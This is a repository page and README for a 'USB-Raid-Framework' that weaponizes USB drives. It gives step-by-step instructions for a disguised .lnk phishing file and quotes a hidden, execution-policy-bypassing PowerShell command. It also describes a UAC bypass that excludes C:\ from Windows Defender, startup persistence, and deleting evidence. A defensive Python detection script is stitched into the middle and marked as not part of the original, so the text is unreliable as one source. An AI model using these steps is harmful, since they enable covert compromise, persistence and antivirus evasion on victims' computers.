USB-Raid-Framework

Category: Disk programming
Development tool: Batchfile
File size: 7KB
Downloads: 0
Upload date: 2022-09-29 03:17:45
Uploader: sh-1993
Description: This is a framework used to weaponize any USB Drive

File list:
LICENSE (1068, 2022-09-29)
contacts.txt.lnk (1545, 2022-09-29)
h (0, 2022-09-29)
h\contacts.txt (1138, 2022-09-29)
h\exception.ps1 (520, 2022-09-29)
h\initial.ps1 (4, 2022-09-29)
h\persist.cmd (100, 2022-09-29)
h\persist.ps1 (13, 2022-09-29)
s1.bat (475, 2022-09-29)

# USB-Raid-Framework ![Logo](https://github.com/I-Am-Jakoby/hak5-submissions/blob/main/Assets/logo-170-px.png?raw=true)

Table of Contents
  1. Description
  2. Getting Started
  3. Contributing
  4. Version History
  5. Contact
  6. Acknowledgments

An offensive security framework that weaponizes any standard USB Device

## Description

This framework is designed to be implemented on any standard USB Drive.

This attack takes advantage of the ability to run powershell commands from inside a .lnk file. The following video is another example of how this method may be implemented.

After downloading the .Zip file and placing the contents on your USB drive, you'll want to delete the ReadMe.md and LICENSE file.

Next you will want to make sure the `h` directory and `s1.bat` file have the hidden attribute. You do not want these files to be visible to your target.

Now in the root directory you should have 3 files:

* A hidden `h` directory - Folder containing all the files needed to be moved onto your target's system, and the initial script to be run
* A hidden `s1.bat` file - A bat file called on by the shortcut to move all the above files and execute the initial script
* A `contacts.txt` .lnk file (shortcut) - a shortcut phishing file disguised as a text file to entice your target to open it

The `h` directory will contain 5 more files:

* `contacts.txt` - the actual text file to be opened by the shortcut to convince your target they just opened a regular txt file
* `exception.ps1` - A script containing a UAC bypass to open an admin window and add the target's C:/ drive to the Windows Defender exclusion list. This will prevent further tools you download from being flagged by Defender
* `initial.ps1` - This is a script that will be run one time when the target opens the fake text file
* `persist.cmd` - This is a file added to the start up folder to achieve persistence. It will call on the `persist.ps1` file stored in the AppData directory
* `persist.ps1` - This is the file that will contain your script that will be run every time the target boots up their computer

## Getting Started

Taking advantage of a little known secret we will be running powershell code embedded in a shortcut's target field as seen in the image below.

This has a few advantages.

* You can't run a regular powershell script by double clicking on it. It will only open it with your default text editor. It will run from a shortcut
* External powershell scripts can not be run without triggering the UAC prompt. We use the shortcut to open their own powershell console we run it from to trick their system into thinking it is from a native script.

This is the code in that target text box:

```
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H -ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')
```

This code will open a powershell console and bypass the execution policy and run our bat file after identifying what drive letter our USB is. In order for it to find our drive we must change the label of our USB to match the label used in our code in the target text box. For this example notice the label in the image below and the code above are both `259`. This can be changed but they both need to match.
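A defender's view of the shortcut target described above, as an added example that is not part of the original README: a Python triage function for process-creation command lines (for instance from Sysmon Event ID 1 or Security 4688 records) that flags the traits of that command, including abbreviated parameter spellings. The verdict names, the thresholds and every sample event except the first are assumptions constructed for illustration.

```python
import re

def _param(full, min_len, *aliases):
    """Regex for a PowerShell parameter written as any prefix of its full name."""
    names = [full[:n] for n in range(len(full), min_len - 1, -1)] + list(aliases)
    return r"(?<!\S)[-/](?:%s)(?!\w)" % "|".join(names)

# One indicator per trait of the shortcut target quoted on this page.
INDICATORS = {
    "policy_bypass": re.compile(_param("executionpolicy", 2, "ep") + r"\s+bypass\b", re.I),
    "hidden_window": re.compile(
        _param("windowstyle", 1) + r"\s+h(?:i(?:d(?:d(?:en?)?)?)?)?(?!\w)", re.I),
    "no_profile": re.compile(_param("noprofile", 3), re.I),
    "non_interactive": re.compile(_param("noninteractive", 4), re.I),
    "volume_label_lookup": re.compile(
        r"\b(?:gwmi|get-wmiobject|gcim|get-ciminstance)\s+win32_volume\b.*?\blabel\s*=", re.I),
}
POWERSHELL = re.compile(r'(?:^|[\\/"\s])(?:powershell|pwsh)(?:\.exe)?(?=["\s]|$)', re.I)

def classify(parent_image, command_line):
    """Return (verdict, matched indicator names) for one process-creation event."""
    if not POWERSHELL.search(command_line):
        return "ignore", []
    hits = [name for name, rx in INDICATORS.items() if rx.search(command_line)]
    stealth = {"policy_bypass", "hidden_window"}
    if "volume_label_lookup" in hits and stealth & set(hits):
        return "alert", hits   # finds a volume by label and runs from it, concealed
    if parent_image.lower().endswith("explorer.exe") and stealth <= set(hits):
        return "alert", hits   # a double-click produced a hidden, policy-bypassing shell
    return ("review" if len(hits) >= 2 else "benign"), hits

# Constructed sample events: (parent image, command line). The first is the
# shortcut target from this page; the others are made-up comparison cases.
SAMPLE_EVENTS = [
    (r"C:\Windows\explorer.exe",
     r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -NoP -NonI -W H "
     r"""-ep bypass ".((gwmi win32_volume -f 'label=''259''').Name+'s1.bat')"""),
    (r"C:\Windows\explorer.exe", r'powershell -windowstyle hidden -exec bypass -c "Get-Date"'),
    (r"C:\Windows\System32\svchost.exe",
     r"powershell.exe -NoProfile -NonInteractive -ExecutionPolicy Bypass -File C:\scripts\inv.ps1"),
    (r"C:\Windows\System32\svchost.exe",
     r'"C:\Program Files\PowerShell\7\pwsh.exe" -NoProfile -File C:\scripts\backup.ps1'),
    (r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe E:\contacts.txt"),
]

if __name__ == "__main__":
    for parent, cmd in SAMPLE_EVENTS:
        print(classify(parent, cmd), "<-", cmd[:60])
```

The volume-label lookup is the most specific signal here, because legitimate administrative scripts rarely resolve a drive letter by label on the command line before executing a file from it.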

### Executing program

Once you have all of the above set up you are ready to execute this attack vector.

You will want to have 2 payloads ready.

* Your initial payload to be run once this attack has been initiated. I use my [ADV Recon](https://github.com/I-Am-Jakoby/hak5-submissions/tree/main/OMG/Payloads/OMG-ADV-Recon) payload to gather as much info on my target as possible
* The payload you want to be run with persistence at each reboot on your target's PC (This payload will vary depending on your goal)

Once this attack vector has been initiated by your target opening the fake text file link, it will open the real hidden txt file in the `h` directory to avoid suspicion.

The shortcut will then run the `s1.bat` file that will initialize the rest of your scripts.

First your initial payload will run, followed by moving your `persistance.bat` file to the start up directory.

Then your `persistence.ps1` file will be added to the AppData folder and run once now and again at each start up.

Finally the real hidden text file will replace your fake txt shortcut link and delete the rest of the files to avoid further investigation into your USB drive.

In a real world scenario you would also want to make the USB drive look realistic with a photo album or something else to entice your target to get in contact with you by clicking on the fake contacts.txt file.

### Dependencies

* An internet connection
* Windows 10,11

## Contributing

All contributors' names will be listed here

I am Jakoby

## Version History

* 0.1
  * Initial Release

## Contact

My Socials: YouTube, Twitter, Instagram, Discord

## Acknowledgments

* [Hak5](https://hak5.org/)
* [MG](https://github.com/OMG-MG)
